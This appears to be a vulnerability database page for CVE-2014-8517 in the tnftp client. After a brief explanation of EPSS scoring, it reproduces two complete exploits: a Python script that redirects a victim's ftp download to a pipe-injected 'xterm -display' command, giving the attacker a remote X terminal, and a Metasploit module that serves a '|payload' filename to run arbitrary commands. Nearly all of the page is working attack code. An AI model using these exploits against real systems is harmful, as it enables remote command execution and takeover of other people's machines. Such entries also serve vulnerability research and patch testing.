CVE-2014-8517 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

#!/usr/bin/env python2 # # Exploit Title: [tnftp BSD exploit] # Date: [11/29/2014] # Exploit Author: [dash] # Vendor Homepage: [www.freebsd.org] # Version: [FreeBSD 8/9/10] # Tested on: [FreeBSD 9.3] # CVE : [CVE-2014-8517] # tnftp exploit (CVE-2014-8517)tested against freebsd 9.3 # https://www.freebsd.org/security/advisories/FreeBSD-SA-14:26.ftp.asc # # 29 Nov 2014 by [email protected] # # usage: # # redirect the vulnerable ftp client requests for http to your machine # # client will do something like: # ftp http://ftp.freebsd.org/data.txt # # you will intercept the dns request and redirect victim to your fake webserver ip # # attacker: start on 192.168.2.1 Xnest: Xnest -ac :1 # probably do also xhost+victimip # # attacker: python CVE-2014-8517.py 192.168.1.1 81 192.168.1.1 # # sadly you cannot put a slash behind the | also www-encoded is not working # plus problems with extra pipes # this renders a lot of usefull commands useless # so xterm -display it was ;) # # *dirty* *dirdy* *dyrdy* *shell* ! # import os import sys import time import socket def usage(): print "CVE-2014-8517 tnftp exploit" print "by [email protected] in 29 Nov 2014" print print "%s <redirect ip> <redirect port> <reverse xterm ip>"% (sys.argv[0]) print "%s 192.168.1.1 81 192.168.2.1"% (sys.argv[0]) #bind a fake webserver on 0.0.0.0 port 80 def webserveRedirect(redirect): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind(("0.0.0.0",80)) s.listen(3) h, c = s.accept() #wait for request #print h.recv(1024) #send 302 print "[+] Sending redirect :>" h.send(redirect) s.close() return 0 #bind a fake webserver on port %rport def deliverUgga(owned): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind(("0.0.0.0",rport)) s.listen(3) h, c = s.accept() # print h.recv(1024) print "[+] Deliver some content (shell is spwaned now)" h.send(owned) s.close() return 0 owned="""HTTP/1.1 200 Found Date: Fri, 29 Nov 2014 1:00:03 GMT Server: Apache Vary: Accept-Encoding Content-Length: 5 Connection: close Content-Type: text/html; charset=iso-8859-1 ugga ugga """ if(os.getuid())!=0: print "[-] Sorry, you need root to bind port 80!" sys.exit(1) if len(sys.argv)<3: usage() sys.exit(1) rip = sys.argv[1] rport = int(sys.argv[2]) revip = sys.argv[3] print "[+] Starting tnftp BSD client side exploit (CVE-2014-8517)" print "[+] Dont forget to run Xnest -ac :1" # ok, lets use xterm -display cmd = "xterm -display %s:1" % (revip) cmd = cmd.replace(" ","%20") print "[+] Payload: [%s]" % cmd redirect = "HTTP/1.1 302\r\n"\ "Content-Type: text/html\r\n"\ "Connection: keep-alive\r\n"\ "Location: http://%s:%d/cgi-bin/|%s\r\n"\ "\r\n\r\n" % (rip,rport,cmd) #child process owned data delivery uggapid = os.fork() if uggapid == 0: uggapid = os.getpid() deliverUgga(owned) else: #child proces for webserver redirect webpid = os.fork() if webpid == 0: webpid = os.getpid() webserveRedirect(redirect) #childs, come home! try: os.waitpid(webpid,0) except: pass try: os.waitpid(uggapid,0) except: pass #oh wait :> time.sleep(5)

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer include Msf::Auxiliary::Report def initialize(info = {}) super(update_info(info, 'Name' => 'tnftp "savefile" Arbitrary Command Execution', 'Description' => %q{ This module exploits an arbitrary command execution vulnerability in tnftp's handling of the resolved output filename - called "savefile" in the source - from a requested resource. If tnftp is executed without the -o command-line option, it will resolve the output filename from the last component of the requested resource. If the output filename begins with a "|" character, tnftp will pass the fetched resource's output to the command directly following the "|" character through the use of the popen() function. }, 'Author' => [ 'Jared McNeill', # Vulnerability discovery 'wvu' # Metasploit module ], 'References' => [ ['CVE', '2014-8517'], ['URL', 'http://seclists.org/oss-sec/2014/q4/459'] ], 'DisclosureDate' => 'Oct 28 2014', 'License' => MSF_LICENSE, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Privileged' => false, 'Payload' => {'BadChars' => '/'}, 'Targets' => [['ftp(1)', {}]], 'DefaultTarget' => 0 )) end def on_request_uri(cli, request) unless request['User-Agent'] =~ /(tn|NetBSD-)ftp/ print_status("#{request['User-Agent']} connected") send_not_found(cli) return end if request.uri.ends_with?(sploit) send_response(cli, '') print_good("Executing `#{payload.encoded}'!") report_vuln( :host => cli.peerhost, :name => self.name, :refs => self.references, :info => request['User-Agent'] ) else print_status("#{request['User-Agent']} connected") print_status('Redirecting to exploit...') send_redirect(cli, sploit_uri) end end def sploit_uri (get_uri.ends_with?('/') ? get_uri : "#{get_uri}/") + Rex::Text.uri_encode(sploit, 'hex-all') end def sploit "|#{payload.encoded}" end end